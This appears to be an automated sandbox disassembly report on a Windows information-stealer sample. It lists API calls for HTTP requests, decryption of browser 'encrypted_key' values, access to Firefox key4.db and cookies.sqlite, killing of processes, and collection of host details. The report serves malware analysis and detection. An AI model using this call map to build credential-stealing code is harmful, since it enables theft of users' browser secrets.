                                                                                                                                                                                                                                                                                      • Opcode ID: b3d858f19f8d577d2ca6532e9e1bf2584ef083a26a7cebbf2994b5fa81393a97
                                                                                                                                                                                                                                                                                      • Instruction ID: 41c0b1b83a52b27a2bdfeff9d3ed397a321de4e9cb8fcf5d4a551c39b82ef4d0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3d858f19f8d577d2ca6532e9e1bf2584ef083a26a7cebbf2994b5fa81393a97
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D431AD323413509BCB119B05C8C0F253362AF99B98FAE01F6E902BB7B7D27C9C41865D
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      • InternetOpenA.WININET ref: 004042E1
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,https), ref: 004042F4
                                                                                                                                                                                                                                                                                      • InternetConnectA.WININET ref: 0040432D
                                                                                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(00000000,GET,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00404360
                                                                                                                                                                                                                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,FFFFFFFF,00000004), ref: 00404387
                                                                                                                                                                                                                                                                                      • HttpSendRequestA.WININET ref: 0040439B
                                                                                                                                                                                                                                                                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004043B3
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004043F0
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040446D
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00404478
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Internet$Http$CloseHandleOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                                                                                                                                                                                                                      • String ID: ERROR$GET$HTTP/1.1$https
                                                                                                                                                                                                                                                                                      • API String ID: 1693188093-2961588264
                                                                                                                                                                                                                                                                                      • Opcode ID: 2e2f3eead9419f441d624b4b2d1e8f2e1cd83a2dda5262dd01751a01b6ddd133
                                                                                                                                                                                                                                                                                      • Instruction ID: 3507938dcee9cc1a0527973a4bd5b6eba6c84462808e0f35a45f5f60c0c7131e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e2f3eead9419f441d624b4b2d1e8f2e1cd83a2dda5262dd01751a01b6ddd133
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D451D771A00319ABDB10DFA4DC85FFF7779AF84704F00452AFA05A7281DB78A985CBA5
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                        • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,00000000,?,?,?,00000000), ref: 0040794C
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,-00000010,0041FE20,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040796B
                                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00407999
                                                                                                                                                                                                                                                                                      • CryptUnprotectData.CRYPT32 ref: 00407AFA
                                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00407B13
                                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 00407B39
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00407BC2
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Local$Alloc$File$Freelstrlen$CloseCreateCryptDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                                                                                                                                                      • String ID: "encrypted_key":"$AES$ChainingMode$ChainingModeGCM$DPAP$_key.txt
                                                                                                                                                                                                                                                                                      • API String ID: 72760943-530840575
                                                                                                                                                                                                                                                                                      • Opcode ID: 80c8c99dc66d1a3a314694ca8b656682875a6de58e5a181b00e7ea29ddd83769
                                                                                                                                                                                                                                                                                      • Instruction ID: 10bc9677902d6ee6c816a36e6349628b10f5ac32de00f2ba7c41a4f543123621
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80c8c99dc66d1a3a314694ca8b656682875a6de58e5a181b00e7ea29ddd83769
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93A1C571E042159BDB10DFA1CC85BAE7BB5FF44304F10452AE901BB291D778BA45CBA6
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,?,?,0042119A,?,?,0042150A), ref: 004094C5
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004095D2
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00409766
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Filelstrcpy$Locallstrcatlstrlen$AllocCloseCopyCreateFindFirstFreeHandleReadSizeSystemTimestrlen
                                                                                                                                                                                                                                                                                      • String ID: C:\ProgramData\$\key4.db$cookies.sqlite
                                                                                                                                                                                                                                                                                      • API String ID: 621517324-1530792146
                                                                                                                                                                                                                                                                                      • Opcode ID: efc8b8d459f8125ef32f95508c9d4e357bcd32b5b3231743abb90690a61e27b0
                                                                                                                                                                                                                                                                                      • Instruction ID: 855358d25c22b69566fbc42c17e74533ab55524d0b71b666bfbe4b79f85c7bd2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: efc8b8d459f8125ef32f95508c9d4e357bcd32b5b3231743abb90690a61e27b0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6CC1B631A102189BCF14EBB1CC95AEE7779AF44304F44005EF80667292DB7C6EC5CBA9
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411FB6
                                                                                                                                                                                                                                                                                      • Process32First.KERNEL32(00000000,00000128), ref: 00411FC4
                                                                                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 00411FD0
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00411FF1
                                                                                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 00411FFE
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,?), ref: 0041200A
                                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041201E
                                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041202D
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00412036
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3836391474-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 73d56ab98b17da3653dff67e089b2de93a438a2d9c22f275f8cd819916ddfa29
                                                                                                                                                                                                                                                                                      • Instruction ID: 924cd2998aa8e6582c44da8d0305fac9719003efd41fa9ed3311d7015259d757
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73d56ab98b17da3653dff67e089b2de93a438a2d9c22f275f8cd819916ddfa29
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B115231104305AFD3201F61BD0CFAFBAADEBC9785F04501DFA45D62A0DF79A851CAA9
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      • GetKeyboardLayoutList.USER32(00000000,00000000,0042150A), ref: 00410A11
                                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410A23
                                                                                                                                                                                                                                                                                      • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410A2D
                                                                                                                                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200), ref: 00410A4D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000,00000200,?,?,?), ref: 00410AB4
                                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00410B18
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcpy$InfoKeyboardLayoutListLocalLocale$AllocFreelstrcatlstrlenmemset
                                                                                                                                                                                                                                                                                      • String ID: /
                                                                                                                                                                                                                                                                                      • API String ID: 2580590304-4001269591
                                                                                                                                                                                                                                                                                      • Opcode ID: 47d8d58765390bafa4d4b739f7cf5a28c409f74912168362484b764a7be3d9a5
                                                                                                                                                                                                                                                                                      • Instruction ID: eea5c3a77f3b4bcccf0633d63ef4e7b0d3230a8af430361ee2a26d3609cb3d8b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47d8d58765390bafa4d4b739f7cf5a28c409f74912168362484b764a7be3d9a5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5831A8313043186BD7106B919C89FAF779DEB85748F00051EF9469B291DABCAD8487A9
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 00412065
                                                                                                                                                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 00412071
                                                                                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,?), ref: 0041207D
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 00412091
                                                                                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,?), ref: 00412099
                                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 004120B6
                                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 004120C5
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 004120CE
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3836391474-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a0b7ef02e1583a47d1d21b47bccce1f0927895e069a30e1cc4337bfc16cdf067
                                                                                                                                                                                                                                                                                      • Instruction ID: 36dad1cb0fcbca0ffdfdd7c06b199559f2c5def7befbfc21f7e452e0f853ed5d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0b7ef02e1583a47d1d21b47bccce1f0927895e069a30e1cc4337bfc16cdf067
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93017571201214AFE7205B20BD48FBFBEADEF85781F14151DF605D6190CBA99CA1C6BA
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,00403103,00000000,00000000,?,?,?), ref: 004116E9
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 004116FC
                                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 00411706
                                                                                                                                                                                                                                                                                      • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0041171D
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00411733
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 00411741
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 0041174B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$BinaryCryptProcessString$AllocateErrorFreeLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 798923657-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 337ad27f9ad8079b430cc19cc8451ae19a993c84305c3c21a313def544d549b9
                                                                                                                                                                                                                                                                                      • Instruction ID: b00e23e61dcd96af2d5a42df421a2e3100774d4436a7fe2bda2c6e10979a2865
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 337ad27f9ad8079b430cc19cc8451ae19a993c84305c3c21a313def544d549b9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C114575204202AFE7208F25EC44F67BBA9EF88700F15081DF6A2973A0DB75EC41CBA5
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,00421509,?,?,?,?,?,?,AV: ,?,?,00421509,?,?,?), ref: 0041099D
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004109AB
                                                                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004109B2
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004109DC
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                                                      • String ID: wwww
                                                                                                                                                                                                                                                                                      • API String ID: 362916592-671953474
                                                                                                                                                                                                                                                                                      • Opcode ID: d02d355f946309d5fb77ffe609dd2dd317ed8e5471a32a046b4ab4715d77f78c
                                                                                                                                                                                                                                                                                      • Instruction ID: 9378462ab9666fb6dba0cc2dba94d0b141e63b92265a990e46b9389926462d0e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d02d355f946309d5fb77ffe609dd2dd317ed8e5471a32a046b4ab4715d77f78c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5F02BB1B001105BE704573CBC0AB6A365A4BC6314F1A8225F591DF3E4DE749C5187C5
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00407060: strlen.MSVCRT ref: 0040708A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00407060: strlen.MSVCRT ref: 004070EB
                                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,00000000), ref: 00407009
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00407041
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00407059
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: strlen$??3@FileFindFirst_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                      • String ID: \LOCK
                                                                                                                                                                                                                                                                                      • API String ID: 3598502236-2879356017
                                                                                                                                                                                                                                                                                      • Opcode ID: 952b9b43d773132738958d387f29db73d7e192de4124f97fd59f734c76a160b2
                                                                                                                                                                                                                                                                                      • Instruction ID: f44c4d4fe338d5c98bb0dd275f70c49df30f8ba6c2b9d28de0915081bc548b38
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 952b9b43d773132738958d387f29db73d7e192de4124f97fd59f734c76a160b2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CAF0D631D1811187DB1876799D45A6F72919F42730F540B3FF566B72C1E239BC80428B
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D), ref: 004108E2
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F), ref: 004108F0
                                                                                                                                                                                                                                                                                      • GetComputerNameA.KERNEL32(00000000), ref: 00410903
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4203777966-0
                                                                                                                                                                                                                                                                                      • Opcode ID: feae78843d13951cbab47ac6d3ffa1349c38900b414b545e2837c5939a7629b8
                                                                                                                                                                                                                                                                                      • Instruction ID: bdf7840bdb5d23557ca24adf21b56bf8b998ac4781c5fcf1cdb6254bbd2a154a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: feae78843d13951cbab47ac6d3ffa1349c38900b414b545e2837c5939a7629b8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34D05EF07012206BE720AB69BC5DB873A9CAF157A1F440031F986C6260D3B888C1C699
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                      • GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1206570057-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2b361677700be1ff8942658dc204bee90d98a7bfd06238250aeafa4148f7f011
                                                                                                                                                                                                                                                                                      • Instruction ID: b80074a2059a1f3756ce7d307e25dbd51f94fcbc115dd2ec99a1d9f33b013242
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b361677700be1ff8942658dc204bee90d98a7bfd06238250aeafa4148f7f011
